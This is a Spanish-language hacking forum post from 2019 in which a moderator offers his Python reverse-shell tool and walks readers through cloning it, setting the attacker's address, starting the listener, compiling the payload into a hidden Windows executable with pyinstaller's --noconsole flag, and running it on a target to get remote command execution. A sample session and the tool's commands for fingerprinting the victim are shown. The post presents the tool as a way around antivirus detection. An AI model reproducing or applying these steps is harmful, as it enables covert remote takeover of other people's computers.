Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Hackeando Windows y Linux en el 2019

  • 0 Respuestas
  • 2753 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado DtxdF

  • *
  • Moderador
  • Mensajes: 370
  • Actividad:
    38.33%
  • Reputación 7
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
« en: Enero 26, 2019, 01:51:49 pm »
Hola gente de underc0de :D

Hoy les traigo dos aportes al mismo tiempo y así les demuestro un protocolo que ya publiqué en este mismo foro en la sección de python: https://underc0de.org/foro/python/t38510/ (Recomiendo que lean primero este post, antes de continuar).

Eh visto muchos programas, scripts, aplicaciones, etc; que pueden acceder a computadores fácilmente pero hay dos inconvenientes principales: la detección de los antivirus y que no se pueden editar. Me refiero más que todos a los rats y parecidos.

En este post quiero brindarles una herramienta sencilla para que no sólo se motiven a usar, también a editarla y visualizar su código (más que todos aquellos que quieren aprender a programar, están o lo estarán o simplemente porque están aburridos xD).

Pueden clonarlo desde mi repositorio: https://github.com/DtxdF/reverse-shell-sdc

Y tendran que editar los archivos: server.py (Este no es necesario, si quieren, ya que el host se detectara automáticamente y el puerto por defecto es 8443) y reverse_shell.py (con la dirección de la máquina atacante). Me refiero a editar las variables.

Pasos para su uso:

Primero: La clonaremos (En el caso de que no tengas instalado 'git', sólo usa tu navegador y descarga el zip): git clone https://github.com/DtxdF/reverse-shell-sdc
Segundo: nos dirigimos al directorio creado y procedemos a editar las variables de el archivo reverse_shell.py:



Como ven en la imagen: la variable 'host_attacker' (va la dirección del atacante), 'port' (puerto a conectarse), 'password' (la contraseña para encriptar y desencriptar los datos del protocolo. Debe tener 32 caracteres), 'repeticiones' (las repeticiones de cifrado y de descifrado en el protocolo).

Las editaremos según lo obligatorio y a nuestro gusto.

Tercero: en el archivo server.py no es necesario editarlo ya que la dirección IP se auto detecta y el puerto por defecto es 8443

Una vez hecho todo lo necesario, arrancamos el servidor: python2 server.py, nos indicara: 'Esperando conexiones ...'.

Cuarto: compilaremos reverse_shell.py a un ejecutable de Windows o para Linux. En este caso yo lo compilare para Windows con pyinstaller:

pyinstaller reverse_shell.py --onefile --noconsole

Los parámetros:

--onefile: para que se cree sólo un archivo
--noconsole: no se muestre nada en pantalla

Y por último: ejecutamos la carga útil en la máquina que deseemos atacar y tendremos una conexión remota, para ejecutar comandos:

Citar
$ python2 server.py
Esperando conexiones ...
127.0.0.1:48812 >>> whoami
Enviando comando a :: 127.0.0.1:48812 ...
127.0.0.1:48812 >>>

pc\pcc


127.0.0.1:48812 >>>

Listo, podremos controlar una PC remotamente de forma segura.

Algunos comandos de ayuda, aunque los puedes apreciar en el código fuente de reverse_shell.py:

getinfo: obtener información de la máquina: sistema operativo, procesador, dirección IP, ciudad, país, arquitectura, etc.
cd: puedes moverte a la ruta que desees remotamente
pwd: ver la ruta actual
exit: salir de las dos aplicaciones
Comandos del sistema: ejecutar comandos remotamente

Está aplicación puedes usarla para reunir información, fingerprinting, etc.

Más imágenes:



Gracias :'D
Los seres humanos son robots, cuyo combustible es el afanado dinero.

 

¿Te gustó el post? COMPARTILO!



Offensive Security penetration testing with Kali Linux (Traducción al español)

Iniciado por Hex4w0rd

Respuestas: 27
Vistas: 14524
Último mensaje Noviembre 01, 2017, 08:51:12 pm
por Codig0Bit
Herramientas Kali Linux - Email búsqueda collector y la cosechadora

Iniciado por Iny3trol

Respuestas: 0
Vistas: 2910
Último mensaje Enero 23, 2015, 10:46:57 pm
por Iny3trol
WPA2 KRACK ATTACK - Prueba de concepto Android y Linux

Iniciado por DhaveSec

Respuestas: 1
Vistas: 3984
Último mensaje Octubre 16, 2017, 01:27:26 pm
por b4r7
LinDrop - Ingeniería social para objetivos Linux

Iniciado por HATI

Respuestas: 5
Vistas: 4463
Último mensaje Diciembre 03, 2016, 10:43:00 am
por m4x
Aplicaciones recomendadas sobre hacking para Linux

Iniciado por black magdala

Respuestas: 0
Vistas: 2447
Último mensaje Septiembre 13, 2016, 04:52:34 pm
por black magdala